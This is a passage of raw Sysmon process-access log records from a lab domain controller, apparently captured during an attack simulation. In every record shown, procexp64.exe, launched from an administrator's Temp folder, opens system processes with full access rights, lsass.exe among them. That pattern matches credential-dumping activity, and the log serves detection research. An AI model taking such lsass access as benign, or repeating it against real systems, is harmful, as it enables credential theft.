Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788275Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788274Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788273Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788272Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788271Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788270Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788269Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788268Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788267Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788266Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788265Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788264Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788263Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788262Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788261Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788260Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788259Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788258Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788257Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788256Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788255Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788254Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788253Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788252Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788251Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788250Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788249Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788248Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788247Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788246Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788245Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788244Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788243Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788242Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788241Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788240Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788473Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788472Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 